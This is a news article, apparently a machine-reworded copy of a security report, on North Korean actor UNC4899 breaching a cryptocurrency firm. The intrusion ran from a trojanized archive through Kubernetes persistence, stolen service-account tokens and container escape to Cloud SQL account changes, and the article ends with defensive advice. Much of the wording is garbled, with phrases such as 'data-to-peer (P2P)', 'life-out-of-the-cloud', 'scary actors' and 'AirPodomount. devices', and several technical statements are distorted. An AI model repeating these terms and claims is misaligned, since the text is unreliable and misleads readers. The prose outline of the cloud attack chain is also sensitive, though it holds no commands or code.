UNC4899 Breached Crypto Firm After Developer Downloaded Trojanized File to Operating Device
The North Korean threat actor known as UNC4899 is suspected of being behind a sophisticated cloud compromise campaign targeting a cryptocurrency organization in 2025 to steal millions of dollars in cryptocurrency.
The operation is said to be related to the moderate confidence of the state-sponsored enemy, which is also being tracked under the pseudonyms Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor.
“This incident is notable for its combination of social engineering, exploiting personal device data-to-peer (P2P) transfer methods, workflows, and ultimately pivoting to the cloud to implement life-out-of-the-cloud (LOTC) strategies,” the tech giant said in its H1 2026 Cloud Threat Horizons Report. [PDF] shared on The Hacker News.
Upon reaching the cloud environment, attackers are said to have abused legitimate DevOps workflows to harvest data, break out of container containment, and compromise Cloud SQL databases to facilitate cryptocurrency theft.
The series of attacks, Google Cloud said, represents a continuation of what began with the compromise of a developer’s personal device in the company’s workplace, before jumping to the cloud to make unauthorized changes to the financial logic.
It all started with scary actors using social engineering tactics to trick a developer into downloading an archived file as part of a so-called open source project collaboration. The engineer then transferred the same file to his company’s device via AirDrop.
“Using an AI-assisted Integrated Development Environment (IDE), the victim then interacted with the contents of the archive, eventually using embedded Python code, which generated and executed the binary that created the Kubernetes command-line tool,” Google said.
The binary then affected a domain controlled by the attacker and acted as a gateway to the victim’s business machine, giving attackers a way to get around the Google Cloud environment by using authenticated sessions and available credentials. This step was followed by the first phase of evaluation aimed at gathering information about various services and projects.
The attack moved to the next stage with the discovery of the bastion host, where the adversary modified the multi-factor authentication (MFA) policy attribute to access it and perform additional information, including navigating to specific pods within the Kubernetes environment.
Later, UNC4899 adopted a live-off-the-cloud (LotC) approach to setting up persistence methods by changing the Kubernetes deployment configuration to automatically run the bash command when new pods are created. The command, on the other hand, downloaded a backdoor.
Some of the steps taken by the threat actor are listed below –
- Kubernetes services bound to the victim CI/CD platform solution were modified to inject commands that display service account tokens in the log.
- The attacker obtained a high-privilege CI/CD service account token, allowing them to escalate their privileges and conduct lateral movements, specifically targeting the pod that manages network policies and load balancing.
- The stolen service account token was used to authenticate to a sensitive infrastructure pod running in privileged mode, to escape the container, and to deploy a backdoor for continued access.
- Another round of research done by the threat actor before focusing their attention on the workload responsible for managing customer information, such as user identity, account security, and crypto wallet information.
- An attacker used it to extract static database credentials that were stored insecurely in pod environment variables.
- Authentication is then compromised to access the production database via Cloud SQL Auth Proxy and execute SQL commands to make user account changes. This includes password resets and MFA seed updates for a few high value accounts.
- The attack culminated in the use of compromised accounts to successfully withdraw several million dollars in digital assets.
The incident “highlights the serious risks posed by personal-to-business P2P data transfer methods and other data bridges, privileged containment methods, and insecure management of privacy in the cloud environment,” Google said. “Organizations must adopt a deep security strategy that strongly ensures identity, restricts data transfer to endpoints, and enforces strict separation between cloud runtime environments to limit the blast radius of an intrusion event.”
To combat the threat, organizations are advised to use context-aware access and anti-phishing MFA, ensure that only trusted images are sent, isolate compromised nodes from establishing connections with external hosts, monitor unexpected container processes, adopt strong privacy management, implement policies to disable or limit peer-to-peer file sharing or external Bluetooth file sharing using the AirPodomount. devices.
